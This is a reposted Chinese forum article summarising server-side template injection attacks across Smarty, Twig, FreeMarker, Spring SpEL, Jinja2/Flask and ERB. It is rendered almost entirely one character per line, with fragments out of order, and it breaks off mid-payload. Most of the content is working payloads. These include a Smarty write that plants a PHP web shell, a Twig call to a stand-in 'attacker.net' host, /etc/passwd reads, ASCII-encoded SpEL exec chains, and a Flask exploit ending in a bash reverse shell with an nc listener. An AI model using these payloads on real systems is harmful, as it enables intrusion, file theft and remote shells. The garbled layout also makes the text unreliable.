论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
漏洞
[18874] 2019-06-22_ssti漏洞总结
文档创建者:
s7ckTeam
浏览次数:
16
最后更新:
2025-01-18
漏洞
16 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2019-06-22_ssti漏洞总结
s
s
t
i
漏
洞
总
结
c
r
h
u
a
h
u
a
s
e
c
2
0
1
9
-
0
6
-
2
2
0
1
—
介
绍
介
绍
S
S
T
I
,
又
称
服
务
端
模
板
注
入
攻
击
。
其
发
生
在
M
V
C
框
架
中
的
v
i
e
w
层
。
服
务
端
接
收
到
了
用
户
的
输
入
,
将
其
作
为
W
e
b
应
用
模
板
内
容
的
一
部
分
,
在
进
行
目
标
编
译
渲
染
的
过
程
中
,
执
行
了
用
户
插
入
的
恶
意
内
容
,
因
此
可
能
导
致
敏
感
信
息
泄
露
、
代
码
执
行
等
问
题
。
0
2
—
模
板
引
擎
及
攻
击
方
式
模
板
引
擎
及
攻
击
方
式
1
.
p
h
p
S
m
a
r
t
y
T
w
i
g
B
l
a
d
e
2
.
j
a
v
a
j
s
p
F
r
e
e
M
a
r
k
e
r
{
p
h
p
}
e
c
h
o
`
i
d
`
;
{
/
p
h
p
}
{
S
m
a
r
t
y
_
I
n
t
e
r
n
a
l
_
W
r
i
t
e
_
F
i
l
e
:
:
w
r
i
t
e
F
i
l
e
(
$
S
C
R
I
P
T
_
N
A
M
E
,
"
<
?
p
h
p
p
a
s
s
t
h
r
u
(
$
_
G
E
T
[
'
c
m
d
'
]
)
;
?
>
"
,
s
e
l
f
:
:
c
l
e
a
r
C
o
n
f
i
g
(
)
)
}
B
a
s
i
c
I
n
j
e
c
t
i
o
n
{
{
7
*
7
}
}
{
{
7
*
'
7
'
}
}
w
o
u
l
d
r
e
s
u
l
t
i
n
4
9
C
o
d
e
e
x
e
c
u
t
i
o
n
{
{
s
e
l
f
}
}
{
{
_
s
e
l
f
.
e
n
v
.
s
e
t
C
a
c
h
e
(
"
f
t
p
:
/
/
a
t
t
a
c
k
e
r
.
n
e
t
:
2
1
2
1
"
)
}
}
{
{
_
s
e
l
f
.
e
n
v
.
l
o
a
d
T
e
m
p
l
a
t
e
(
"
b
a
c
k
d
o
o
r
"
)
}
}
{
{
_
s
e
l
f
.
e
n
v
.
r
e
g
i
s
t
e
r
U
n
d
e
f
i
n
e
d
F
i
l
t
e
r
C
a
l
l
b
a
c
k
(
"
e
x
e
c
"
)
}
}
{
{
_
s
e
l
f
.
e
n
v
.
g
e
t
F
i
l
t
e
r
(
"
i
d
"
)
}
}
B
a
s
i
c
i
n
j
e
c
t
i
o
n
$
{
7
*
7
}
$
{
{
7
*
7
}
}
$
{
c
l
a
s
s
.
g
e
t
C
l
a
s
s
L
o
a
d
e
r
(
)
}
$
{
c
l
a
s
s
.
g
e
t
R
e
s
o
u
r
c
e
(
"
"
)
.
g
e
t
P
a
t
h
(
)
}
$
{
c
l
a
s
s
.
g
e
t
R
e
s
o
u
r
c
e
(
"
.
.
/
.
.
/
.
.
/
.
.
/
.
.
/
i
n
d
e
x
.
h
t
m
"
)
.
g
e
t
C
o
n
t
e
n
t
(
)
}
R
e
t
r
i
e
v
e
t
h
e
s
y
s
t
e
m
’
s
e
n
v
i
r
o
n
m
e
n
t
v
a
r
i
a
b
l
e
s
$
{
T
(
j
a
v
a
.
l
a
n
g
.
S
y
s
t
e
m
)
.
g
e
t
e
n
v
(
)
}
R
e
t
r
i
e
v
e
/
e
t
c
/
p
a
s
s
w
d
$
{
T
(
j
a
v
a
.
l
a
n
g
.
R
u
n
t
i
m
e
)
.
g
e
t
R
u
n
t
i
m
e
(
)
.
e
x
e
c
(
'
c
a
t
e
t
c
/
p
a
s
s
w
d
'
)
}
$
{
T
(
o
r
g
.
a
p
a
c
h
e
.
c
o
m
m
o
n
s
.
i
o
.
I
O
U
t
i
l
s
)
.
t
o
S
t
r
i
n
g
(
T
(
j
a
v
a
.
l
a
n
g
.
R
u
n
t
i
m
e
)
.
g
e
t
R
u
n
t
i
m
e
(
)
.
e
x
e
c
(
T
(
j
a
v
a
.
l
a
n
g
.
C
h
a
r
a
c
t
e
r
)
.
t
o
S
t
r
i
n
g
(
9
9
)
.
c
o
n
c
a
t
(
T
(
j
a
v
a
.
l
a
n
g
.
C
h
a
r
a
c
t
e
r
)
.
t
o
S
t
r
i
n
g
(
9
7
)
)
.
c
o
n
c
a
t
(
T
(
j
a
v
a
.
l
a
n
g
.
B
a
s
i
c
i
n
j
e
c
t
i
o
n
$
{
3
*
3
}
#
{
3
*
3
}
V
e
l
o
c
i
t
y
3
.
p
y
t
h
o
n
J
i
n
j
a
2
D
j
a
n
g
o
t
o
r
n
a
d
o
4
.
R
u
b
y
0
3
—
漏
洞
案
例
漏
洞
案
例
p
h
p
T
w
i
g
C
o
d
e
e
x
e
c
u
t
i
o
n
<
#
a
s
s
i
g
n
e
x
=
"
f
r
e
e
m
a
r
k
e
r
.
t
e
m
p
l
a
t
e
.
u
t
i
l
i
t
y
.
E
x
e
c
u
t
e
"
?
n
e
w
(
)
>
$
{
e
x
(
"
i
d
"
)
}
[
#
a
s
s
i
g
n
e
x
=
'
f
r
e
e
m
a
r
k
e
r
.
t
e
m
p
l
a
t
e
.
u
t
i
l
i
t
y
.
E
x
e
c
u
t
e
'
?
n
e
w
(
)
]
$
{
e
x
(
'
i
d
'
)
}
B
a
s
i
c
i
n
j
e
c
t
i
o
n
{
{
4
*
4
}
}
[
[
5
*
5
]
]
{
{
7
*
'
7
'
}
}
w
o
u
l
d
r
e
s
u
l
t
i
n
7
7
7
7
7
7
7
{
{
c
o
n
f
i
g
.
i
t
e
m
s
(
)
}
}
D
u
m
p
a
l
l
u
s
e
d
c
l
a
s
s
e
s
{
{
[
]
.
c
l
a
s
s
.
b
a
s
e
.
s
u
b
c
l
a
s
s
e
s
(
)
}
}
{
{
'
'
.
c
l
a
s
s
.
m
r
o
(
)
[
1
]
.
s
u
b
c
l
a
s
s
e
s
(
)
}
}
{
{
'
'
.
_
_
c
l
a
s
s
_
_
.
_
_
m
r
o
_
_
[
2
]
.
_
_
s
u
b
c
l
a
s
s
e
s
_
_
(
)
}
}
D
u
m
p
a
l
l
c
o
n
f
i
g
v
a
r
i
a
b
l
e
s
{
%
f
o
r
k
e
y
,
v
a
l
u
e
i
n
c
o
n
f
i
g
.
i
t
e
r
i
t
e
m
s
(
)
%
}
<
d
t
>
{
{
k
e
y
|
e
}
}
<
/
d
t
>
<
d
d
>
{
{
v
a
l
u
e
|
e
}
}
<
/
d
d
>
{
%
e
n
d
f
o
r
%
}
R
e
a
d
r
e
m
o
t
e
f
i
l
e
#
'
'
.
_
_
c
l
a
s
s
_
_
.
_
_
m
r
o
_
_
[
2
]
.
_
_
s
u
b
c
l
a
s
s
e
s
_
_
(
)
[
4
0
]
=
F
i
l
e
c
l
a
s
s
{
{
'
'
.
_
_
c
l
a
s
s
_
_
.
_
_
m
r
o
_
_
[
2
]
.
_
_
s
u
b
c
l
a
s
s
e
s
_
_
(
)
[
4
0
]
(
'
/
e
t
c
/
p
a
s
s
w
d
'
)
.
r
e
a
d
(
)
}
}
{
{
c
o
n
f
i
g
.
i
t
e
m
s
(
)
[
4
]
[
1
]
.
_
_
c
l
a
s
s
_
_
.
_
_
m
r
o
_
_
[
2
]
.
_
_
s
u
b
c
l
a
s
s
e
s
_
_
(
)
[
4
0
]
(
"
/
t
m
p
/
f
l
a
g
"
)
.
r
e
a
d
(
)
}
}
W
r
i
t
e
i
n
t
o
r
e
m
o
t
e
f
i
l
e
{
{
'
'
.
_
_
c
l
a
s
s
_
_
.
_
_
m
r
o
_
_
[
2
]
.
_
_
s
u
b
c
l
a
s
s
e
s
_
_
(
)
[
4
0
]
(
'
/
v
a
r
/
w
w
w
/
h
t
m
l
/
m
y
f
l
a
s
k
a
p
p
/
h
e
l
l
o
.
t
x
t
'
,
'
w
'
)
.
w
r
i
t
e
(
'
H
e
l
l
o
h
e
r
e
!
'
)
}
}
R
e
m
o
t
e
C
o
d
e
E
x
e
c
u
t
i
o
n
本
地
监
听
:
n
c
-
l
n
v
p
8
0
0
0
模
板
注
入
:
{
{
'
'
.
_
_
c
l
a
s
s
_
_
.
_
_
m
r
o
_
_
[
2
]
.
_
_
s
u
b
c
l
a
s
s
e
s
_
_
(
)
[
4
0
]
(
'
/
t
m
p
/
e
v
i
l
c
o
n
f
i
g
.
c
f
g
'
,
'
w
'
)
.
w
r
i
t
e
(
'
f
r
o
m
s
u
b
p
r
o
c
e
s
s
i
m
p
o
r
t
c
h
e
c
k
_
o
u
t
p
u
t
n
n
R
U
N
C
M
D
=
c
h
e
c
k
_
o
u
t
p
u
t
n
'
)
}
}
#
e
v
i
l
c
o
n
f
i
g
{
{
c
o
n
f
i
g
.
f
r
o
m
_
p
y
f
i
l
e
(
'
/
t
m
p
/
e
v
i
l
c
o
n
f
i
g
.
c
f
g
'
)
}
}
#
l
o
a
d
t
h
e
e
v
i
l
c
o
n
f
i
g
{
{
c
o
n
f
i
g
[
'
R
U
N
C
M
D
'
]
(
'
b
a
s
h
-
i
>
&
/
d
e
v
/
t
c
p
/
x
x
.
x
x
.
x
x
.
x
x
/
8
0
0
0
0
>
&
1
'
,
s
h
e
l
l
=
T
r
u
e
)
}
}
#
c
o
n
n
e
c
t
t
o
e
v
i
l
h
o
s
t
B
a
s
i
c
i
n
j
e
c
t
i
o
n
<
%
=
7
*
7
%
>
R
e
t
r
i
e
v
e
/
e
t
c
/
p
a
s
s
w
d
<
%
=
F
i
l
e
.
o
p
e
n
(
'
/
e
t
c
/
p
a
s
s
w
d
'
)
.
r
e
a
d
%
>
L
i
s
t
f
i
l
e
s
a
n
d
d
i
r
e
c
t
o
r
i
e
s
<
%
=
D
i
r
.
e
n
t
r
i
e
s
(
'
/
'
)
%
>
<
?
p
h
p
r
e
q
u
i
r
e
_
o
n
c
e
d
i
r
n
a
m
e
(
_
_
F
I
L
E
_
_
)
.
'
/
.
.
/
l
i
b
/
T
w
i
g
/
A
u
t
o
l
o
a
d
e
r
.
p
h
p
'
;
T
w
i
g
_
A
u
t
o
l
o
a
d
e
r
:
:
r
e
g
i
s
t
e
r
(
t
r
u
e
)
;
使
用
T
w
i
g
模
版
引
擎
渲
染
页
面
,
其
中
模
版
含
有
{
{
n
a
m
e
}
}
变
量
,
其
模
版
变
量
值
来
自
于
G
E
T
请
求
参
数
$
_
G
E
T
[
"
n
a
m
e
"
]
。
显
然
这
段
代
码
并
没
有
什
么
问
题
,
即
使
你
想
通
过
n
a
m
e
参
数
传
递
一
段
J
a
v
a
S
c
r
i
p
t
代
码
给
服
务
端
进
行
渲
染
,
也
许
你
会
认
为
这
里
可
以
进
行
X
S
S
,
但
是
由
于
模
版
引
擎
一
般
都
默
认
对
渲
染
的
变
量
值
进
行
编
码
和
转
义
,
所
以
并
不
会
造
成
跨
站
脚
本
攻
击
:
但
是
,
如
果
渲
染
的
模
版
内
容
受
到
用
户
的
控
制
,
情
况
就
不
一
样
了
。
修
改
代
码
为
:
上
面
这
段
代
码
在
构
建
模
版
时
,
拼
接
了
用
户
输
入
作
为
模
板
的
内
容
,
现
在
如
果
再
向
服
务
端
直
接
传
递
J
a
v
a
S
c
r
i
p
t
代
码
,
用
户
输
入
会
原
样
输
出
,
测
试
结
果
显
而
易
见
:
在
T
w
i
g
模
板
引
擎
里
,
{
{
v
a
r
}
}
除
了
可
以
输
出
传
递
的
变
量
以
外
,
还
能
执
行
一
些
基
本
的
表
达
式
然
后
将
其
结
果
作
为
该
模
板
变
量
的
值
,
例
如
这
里
用
户
输
入
n
a
m
e
=
{
{
2
*
1
0
}
}
,
T
w
i
g
模
板
引
擎
在
编
译
模
板
的
过
程
中
会
计
算
{
{
2
*
1
0
}
}
中
的
表
达
式
2
*
1
0
,
会
将
其
返
回
值
2
0
作
为
模
板
变
量
的
值
输
出
,
如
下
图
:
现
在
把
测
试
的
数
据
改
变
一
下
,
插
入
一
些
正
常
字
符
和
T
w
i
g
模
板
引
擎
默
认
的
注
释
符
,
构
造
P
a
y
l
o
a
d
为
:
由
于
{
#
c
o
m
m
e
n
t
#
}
作
为
T
w
i
g
模
板
引
擎
的
默
认
注
释
形
式
,
所
以
在
前
端
输
出
的
时
候
并
不
会
显
示
,
而
{
{
2
*
8
}
}
作
为
模
板
变
量
最
终
会
返
回
1
6
作
为
其
值
进
行
显
示
,
因
此
前
端
最
终
会
返
回
内
容
H
e
l
l
o
I
s
V
u
l
n
1
6
O
K
,
如
下
图
:
p
h
p
S
m
a
r
t
y
S
m
a
r
t
y
是
最
流
行
的
P
H
P
模
板
语
言
之
一
,
为
不
受
信
任
的
模
板
执
行
提
供
了
安
全
模
式
。
这
会
强
制
执
行
在
p
h
p
安
全
函
数
白
名
单
中
的
函
数
,
因
此
我
们
在
模
板
中
无
法
直
接
调
用
p
h
p
中
直
接
执
行
命
令
的
函
数
(
相
当
于
存
在
了
一
个
d
i
s
a
b
l
e
_
f
u
n
c
t
i
o
n
)
。
但
是
,
实
际
上
对
语
言
的
限
制
并
不
能
影
响
我
们
执
行
命
令
,
因
为
我
们
首
先
考
虑
的
应
该
是
模
板
本
身
,
恰
好
S
m
a
r
t
y
很
照
顾
我
们
,
在
阅
读
模
板
的
文
档
以
后
我
们
发
现
:
$
s
m
a
r
t
y
内
置
变
量
可
用
于
访
问
各
种
环
境
变
量
,
比
如
我
们
使
用
s
e
l
f
得
到
s
m
a
r
t
y
这
个
类
以
后
我
们
就
去
找
s
m
a
r
t
y
给
我
们
的
好
用
的
方
法
。
比
如
:
T
w
i
g
_
A
u
t
o
l
o
a
d
e
r
:
:
r
e
g
i
s
t
e
r
(
t
r
u
e
)
;
$
t
w
i
g
=
n
e
w
T
w
i
g
_
E
n
v
i
r
o
n
m
e
n
t
(
n
e
w
T
w
i
g
_
L
o
a
d
e
r
_
S
t
r
i
n
g
(
)
)
;
$
o
u
t
p
u
t
=
$
t
w
i
g
-
>
r
e
n
d
e
r
(
"
H
e
l
l
o
{
{
n
a
m
e
}
}
"
,
a
r
r
a
y
(
"
n
a
m
e
"
=
>
$
_
G
E
T
[
"
n
a
m
e
"
]
)
)
;
/
/
将
用
户
输
入
作
为
模
版
变
量
的
值
e
c
h
o
$
o
u
t
p
u
t
;
<
?
p
h
p
r
e
q
u
i
r
e
_
o
n
c
e
d
i
r
n
a
m
e
(
_
_
F
I
L
E
_
_
)
.
'
/
.
.
/
l
i
b
/
T
w
i
g
/
A
u
t
o
l
o
a
d
e
r
.
p
h
p
'
;
T
w
i
g
_
A
u
t
o
l
o
a
d
e
r
:
:
r
e
g
i
s
t
e
r
(
t
r
u
e
)
;
$
t
w
i
g
=
n
e
w
T
w
i
g
_
E
n
v
i
r
o
n
m
e
n
t
(
n
e
w
T
w
i
g
_
L
o
a
d
e
r
_
S
t
r
i
n
g
(
)
)
;
$
o
u
t
p
u
t
=
$
t
w
i
g
-
>
r
e
n
d
e
r
(
"
H
e
l
l
o
{
$
_
G
E
T
[
'
n
a
m
e
'
]
}
"
)
;
/
/
将
用
户
输
入
作
为
模
版
内
容
的
一
部
分
e
c
h
o
$
o
u
t
p
u
t
;
I
s
V
u
l
n
{
#
c
o
m
m
e
n
t
#
}
{
{
2
*
8
}
}
O
K
g
e
t
S
t
r
e
a
m
V
a
r
i
a
b
l
e
(
)
,
这
个
方
法
可
以
获
取
传
入
变
量
的
流
,
就
是
读
文
件
p
a
y
l
o
a
d
:
c
l
a
s
s
S
m
a
r
t
y
_
I
n
t
e
r
n
a
l
_
W
r
i
t
e
_
F
i
l
e
,
这
个
类
中
有
一
个
w
r
i
t
e
F
i
l
e
方
法
,
可
以
写
文
件
。
函
数
原
型
:
但
是
这
个
第
三
个
参
数
是
一
个
S
m
a
r
t
y
类
型
,
后
来
找
到
了
函
数
原
型
:
p
a
y
l
o
a
d
:
j
a
v
a
S
p
r
i
n
g
B
o
o
t
R
C
E
任
何
反
映
用
户
输
入
的
W
h
i
t
e
l
a
b
e
l
错
误
页
面
都
容
易
受
到
攻
击
,
因
为
用
户
输
入
被
视
为
s
p
r
i
n
g
表
达
式
语
言
(
S
p
E
L
)
。
输
入
的
执
行
为
。
然
后
我
想
执
行
一
个
简
单
的
i
d
并
在
屏
幕
上
获
得
结
果
。
我
继
续
执
行
以
下
p
a
y
l
o
a
d
:
输
入
并
没
有
执
行
,
这
让
我
觉
得
引
号
可
能
已
被
编
码
,
可
能
已
经
破
坏
了
e
x
e
c
(
)
命
令
,
接
下
来
要
看
服
务
器
上
的
堆
栈
跟
踪
,
看
看
有
什
么
问
题
。
在
调
试
之
后
,
我
可
以
看
到
单
引
号
和
双
引
号
是
U
R
L
编
码
的
。
e
x
e
c
(
)
方
法
显
然
将
参
数
作
为
字
符
串
。
现
在
,
我
要
么
需
要
在
错
误
代
码
中
查
找
字
符
,
然
后
使
用
s
u
b
s
t
r
i
n
g
(
)
将
其
传
递
给
e
x
e
c
,
这
仍
然
非
常
困
难
,
要
么
需
要
找
到
一
种
方
法
来
传
递
字
符
串
,
或
者
不
使
用
双
引
号
或
单
引
号
。
我
想
用
第
二
种
方
法
。
J
a
v
a
支
持
嵌
套
函
数
,
如
果
我
能
够
找
到
一
个
可
以
输
出
i
d
或
c
a
t
e
t
c
/
p
a
s
s
w
d
的
方
法
,
那
么
这
个
方
法
将
被
传
递
给
e
x
e
c
(
)
,
然
后
我
的
p
a
y
l
o
a
d
将
成
功
运
行
。
在
学
习
了
一
些
J
a
v
a
类
之
后
,
我
偶
然
发
现
了
以
下
内
容
:
现
在
我
用
c
o
n
c
a
t
(
)
方
法
吧
字
母
"
i
"
和
字
母
"
d
"
连
起
来
{
s
e
l
f
:
:
g
e
t
S
t
r
e
a
m
V
a
r
i
a
b
l
e
(
"
f
i
l
e
:
/
/
/
p
r
o
c
/
s
e
l
f
/
l
o
g
i
n
u
i
d
"
)
}
p
u
b
l
i
c
f
u
n
c
t
i
o
n
w
r
i
t
e
F
i
l
e
(
$
_
f
i
l
e
p
a
t
h
,
$
_
c
o
n
t
e
n
t
s
,
S
m
a
r
t
y
$
s
m
a
r
t
y
)
s
e
l
f
:
:
c
l
e
a
r
C
o
n
f
i
g
(
)
p
u
b
l
i
c
f
u
n
c
t
i
o
n
c
l
e
a
r
C
o
n
f
i
g
(
$
v
a
r
n
a
m
e
=
n
u
l
l
)
{
r
e
t
u
r
n
S
m
a
r
t
y
_
I
n
t
e
r
n
a
l
_
E
x
t
e
n
s
i
o
n
_
C
o
n
f
i
g
:
:
c
l
e
a
r
C
o
n
f
i
g
(
$
t
h
i
s
,
$
v
a
r
n
a
m
e
)
;
}
{
S
m
a
r
t
y
_
I
n
t
e
r
n
a
l
_
W
r
i
t
e
_
F
i
l
e
:
:
w
r
i
t
e
F
i
l
e
(
$
S
C
R
I
P
T
_
N
A
M
E
,
"
<
?
p
h
p
p
a
s
s
t
h
r
u
(
$
_
G
E
T
[
'
c
m
d
'
]
)
;
?
>
"
,
s
e
l
f
:
:
c
l
e
a
r
C
o
n
f
i
g
(
)
)
}
h
t
t
p
s
:
/
/
<
d
o
m
a
i
n
>
/
B
a
n
k
D
e
t
a
i
l
F
o
r
m
?
i
d
=
a
b
c
$
{
1
2
*
1
2
}
a
b
c
a
b
c
$
{
1
2
*
1
2
}
a
b
c
a
b
c
1
4
4
a
b
c
$
{
T
(
j
a
v
a
.
l
a
n
g
.
R
u
n
t
i
m
e
)
.
g
e
t
R
u
n
t
i
m
e
(
)
.
e
x
e
c
(
'
i
d
'
)
}
j
a
v
a
.
l
a
n
g
.
C
h
a
r
a
c
t
e
r
.
t
o
S
t
r
i
n
g
(
1
0
5
)
-
>
p
r
i
n
t
s
t
h
e
c
h
a
r
a
c
e
r
'
i
'
j
a
v
a
.
l
a
n
g
.
C
h
a
r
a
c
t
e
r
.
t
o
S
t
r
i
n
g
(
1
0
5
)
.
c
o
n
c
a
t
(
T
(
j
a
v
a
.
l
a
n
g
.
C
h
a
r
a
c
t
e
r
)
.
t
o
S
t
r
i
n
g
(
1
0
0
)
)
-
>
p
r
i
n
t
s
t
h
e
c
h
a
r
a
c
t
e
r
s
'
i
d
'
构
造
的
p
a
y
l
o
a
d
为
:
接
下
来
执
行
c
a
t
e
t
c
/
p
a
s
s
w
d
并
将
结
果
打
印
到
W
h
i
t
e
l
a
b
e
l
错
误
页
面
。
这
意
味
着
我
们
要
把
每
个
字
符
的
A
S
C
I
I
值
写
入
我
们
将
使
用
I
O
U
t
i
l
s
类
并
调
用
t
o
S
t
r
i
n
g
(
)
方
法
。
我
们
可
以
将
一
个
输
入
流
传
递
给
这
个
方
法
,
并
获
得
作
为
响
应
的
流
的
内
容
。
p
a
y
l
o
a
d
:
使
用
了
A
p
a
c
h
e
I
O
U
t
i
l
s
库
。
用
c
h
a
r
a
c
t
e
r
类
将
c
a
t
e
t
c
/
p
a
s
s
w
d
转
换
成
A
S
C
I
I
字
符
,
将
这
个
值
传
递
给
e
x
e
c
(
)
方
法
,
获
得
输
入
流
并
将
其
传
递
给
I
O
U
t
i
l
s
类
的
t
o
S
t
r
i
n
g
(
)
方
法
。
得
到
如
下
结
果
:
p
y
t
h
o
n
F
l
a
s
k
F
l
a
s
k
中
模
板
渲
染
函
数
有
两
个
:
s
e
r
v
e
r
.
p
y
文
件
把
用
户
的
输
入
的
字
符
串
当
作
h
t
m
l
模
板
返
回
给
客
户
端
,
并
插
入
在
模
板
中
,
例
如
输
入
c
r
h
u
a
接
下
来
输
入
{
{
2
-
1
}
}
-
>
p
r
i
n
t
s
t
h
e
c
h
a
r
a
c
t
e
r
s
'
i
d
'
h
t
t
p
s
:
/
/
<
d
o
m
a
i
n
>
/
B
a
n
k
D
e
t
a
i
l
F
o
r
m
?
i
d
=
$
{
T
(
j
a
v
a
.
l
a
n
g
.
R
u
n
t
i
m
e
)
.
g
e
t
R
u
n
t
i
m
e
(
)
.
e
x
e
c
(
T
(
j
a
v
a
.
l
a
n
g
.
C
h
a
r
a
c
t
e
r
)
.
t
o
S
t
r
i
n
g
(
1
0
5
)
.
c
o
n
c
a
t
(
T
(
j
a
v
a
.
l
a
n
g
.
C
h
a
r
a
c
t
e
r
)
.
t
o
S
t
r
i
n
g
(
1
0
0
)
)
)
}
c
o
n
c
a
t
(
T
(
j
a
v
a
.
l
a
n
g
.
C
h
a
r
a
c
t
e
r
)
.
t
o
S
t
r
i
n
g
(
<
a
s
c
i
i
v
a
l
u
e
>
)
)
$
{
T
(
o
r
g
.
a
p
a
c
h
e
.
c
o
m
m
o
n
s
.
i
o
.
I
O
U
t
i
l
s
)
.
t
o
S
t
r
i
n
g
(
T
(
j
a
v
a
.
l
a
n
g
.
R
u
n
t
i
m
e
)
.
g
e
t
R
u
n
t
i
m
e
(
)
.
e
x
e
c
(
T
(
j
a
v
a
.
l
a
n
g
.
C
h
a
r
a
c
t
e
r
)
.
t
o
S
t
r
i
n
g
(
9
9
)
.
c
o
n
c
a
t
(
T
(
j
a
v
a
.
l
a
n
g
.
C
h
a
r
a
c
t
e
r
)
.
t
o
S
t
r
i
n
g
(
9
7
)
)
.
c
o
n
c
a
t
(
T
(
j
a
v
a
.
l
a
n
g
.
C
h
a
r
a
c
t
e
r
)
.
t
o
S
t
r
i
n
g
(
1
1
6
)
)
.
c
o
n
c
a
t
(
T
(
j
a
v
a
.
l
a
n
g
.
C
h
a
r
a
c
t
e
r
)
.
t
o
S
t
r
i
n
g
(
3
2
)
)
.
c
o
n
c
a
t
(
T
(
j
a
v
a
.
l
a
n
g
.
C
h
a
r
a
c
t
e
r
)
.
t
o
S
t
r
i
n
g
(
4
7
)
)
.
c
o
n
c
a
t
(
T
(
j
a
v
a
.
l
a
n
g
.
C
h
a
r
a
c
t
e
r
)
.
t
o
S
t
r
i
n
g
(
1
0
1
)
)
.
c
o
n
c
a
t
(
T
(
j
a
v
a
.
l
a
n
g
.
C
h
a
r
a
c
t
e
r
)
.
t
o
S
t
r
i
n
g
(
1
1
6
)
)
.
c
o
n
c
a
t
(
T
(
j
a
v
a
.
l
a
n
g
.
C
h
a
r
a
c
t
e
r
)
.
t
o
S
t
r
i
n
g
(
9
9
)
)
.
c
o
n
c
a
t
(
T
(
j
a
v
a
.
l
a
n
g
.
C
h
a
r
a
c
t
e
r
)
.
t
o
S
t
r
i
n
g
(
4
7
)
)
.
c
o
n
c
a
t
(
T
(
j
a
v
a
.
l
a
n
g
.
C
h
a
r
a
c
t
e
r
)
.
t
o
S
t
r
i
n
g
(
1
1
2
)
)
.
c
o
n
c
a
t
(
T
(
j
a
v
a
.
l
a
n
g
.
C
h
a
r
a
c
t
e
r
)
.
t
o
S
t
r
i
n
g
(
9
7
)
)
.
c
o
n
c
a
t
(
T
(
j
a
v
a
.
l
a
n
g
.
C
h
a
r
a
c
t
e
r
)
.
t
o
S
t
r
i
n
g
(
1
1
5
)
)
.
c
o
n
c
a
t
(
T
(
j
a
v
a
.
l
a
n
g
.
C
h
a
r
a
c
t
e
r
)
.
t
o
S
t
r
i
n
g
(
1
1
5
)
)
.
c
o
n
c
a
t
(
T
(
j
a
v
a
.
l
a
n
g
.
C
h
a
r
a
c
t
e
r
)
.
t
o
S
t
r
i
n
g
(
1
1
9
)
)
.
c
o
n
c
a
t
(
T
(
j
a
v
a
.
l
a
n
g
.
C
h
a
r
a
c
t
e
r
)
.
t
o
S
t
r
i
n
g
(
1
0
0
)
)
)
.
g
e
t
I
n
p
u
t
S
t
r
e
a
m
(
)
)
}
r
e
n
d
e
r
_
t
e
m
p
l
a
t
e
:
通
过
模
板
文
件
加
载
内
容
并
进
行
渲
染
r
e
n
d
e
r
_
t
e
m
p
l
a
t
e
_
s
t
r
i
n
g
:
直
接
通
过
模
板
字
符
串
进
行
渲
染
f
r
o
m
f
l
a
s
k
i
m
p
o
r
t
F
l
a
s
k
,
r
e
n
d
e
r
_
t
e
m
p
l
a
t
e
_
s
t
r
i
n
g
,
c
o
n
f
i
g
a
p
p
=
F
l
a
s
k
(
_
_
n
a
m
e
_
_
)
@
a
p
p
.
r
o
u
t
e
(
'
/
<
n
a
m
e
>
'
)
d
e
f
i
n
d
e
x
(
n
a
m
e
)
:
t
e
m
p
l
a
t
e
=
'
<
h
1
>
h
e
l
l
o
{
}
!
<
h
1
>
'
.
f
o
r
m
a
t
(
n
a
m
e
)
r
e
t
u
r
n
r
e
n
d
e
r
_
t
e
m
p
l
a
t
e
_
s
t
r
i
n
g
(
t
e
m
p
l
a
t
e
)
a
p
p
.
r
u
n
(
)
用
户
的
输
入
被
插
入
到
模
板
中
,
然
后
被
j
i
n
j
a
2
语
法
解
释
器
解
析
。
返
回
了
解
析
后
的
结
果
由
于
j
i
n
j
a
2
在
设
计
时
就
限
制
了
不
能
执
行
过
多
的
p
y
t
h
o
n
语
句
,
而
且
运
行
环
境
也
是
在
一
个
沙
箱
中
,
以
保
证
安
全
。
我
们
可
以
先
获
取
一
些
f
l
a
s
k
运
行
时
的
数
据
。
攻
击
方
式
:
攻
击
方
式
:
任
意
文
件
读
取
利
用
f
i
l
e
类
向
t
m
p
目
录
下
写
入
p
y
文
件
,
然
后
再
对
其
编
译
,
加
载
到
c
o
n
f
i
g
变
量
中
先
进
行
文
件
的
写
入
然
后
将
其
编
译
加
载
到
c
o
n
f
i
g
变
量
中
接
下
来
就
可
以
任
意
命
令
执
行
了
p
y
t
h
o
n
T
o
r
n
a
d
o
T
o
r
n
a
d
o
中
模
板
渲
染
的
函
数
有
两
个
s
e
r
v
e
r
.
p
y
文
件
模
板
文
件
a
b
c
.
h
t
m
l
在
渲
染
完
成
之
前
将
不
受
信
任
的
用
户
输
入
传
递
到
模
板
数
据
时
,
会
发
生
服
务
器
端
模
板
注
入
(
S
S
T
I
)
。
例
如
代
码
改
为
:
利
用
思
路
:
0
4
{
{
c
o
n
f
i
g
}
}
#
f
l
a
s
k
配
置
数
据
{
{
s
e
s
s
i
o
n
}
}
#
s
e
s
s
i
o
n
数
据
{
{
r
e
q
u
e
s
t
.
e
n
v
i
r
o
n
}
}
#
可
以
获
取
到
服
务
器
的
环
境
变
量
c
o
n
f
i
g
对
象
有
4
个
方
法
:
f
r
o
m
_
e
n
v
v
a
r
,
f
r
o
m
_
o
b
j
e
c
t
,
f
r
o
m
_
p
y
f
i
l
e
,
a
n
d
r
o
o
t
_
p
a
t
h
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
:
5
0
0
0
/
?
n
a
m
e
=
{
{
[
]
.
_
_
c
l
a
s
s
_
_
.
_
_
b
a
s
e
_
_
.
_
_
s
u
b
c
l
a
s
s
e
s
_
_
(
)
[
4
0
]
(
'
/
e
t
c
/
p
a
s
s
w
d
'
)
.
r
e
a
d
(
)
}
}
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
:
5
0
0
0
/
?
n
a
m
e
=
{
{
'
'
.
_
_
c
l
a
s
s
_
_
.
_
_
m
r
o
_
_
[
2
]
.
_
_
s
u
b
c
l
a
s
s
e
s
_
_
(
)
[
4
0
]
(
'
/
t
m
p
/
c
m
d
'
,
'
w
'
)
.
w
r
i
t
e
(
'
f
r
o
m
s
u
b
p
r
o
c
e
s
s
i
m
p
o
r
t
c
h
e
c
k
_
o
u
t
p
u
t
n
n
R
U
N
C
M
D
=
c
h
e
c
k
_
o
u
t
p
u
t
n
'
)
}
}
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
:
5
0
0
0
/
?
n
a
m
e
=
{
{
c
o
n
f
i
g
.
f
r
o
m
_
p
y
f
i
l
e
(
'
/
t
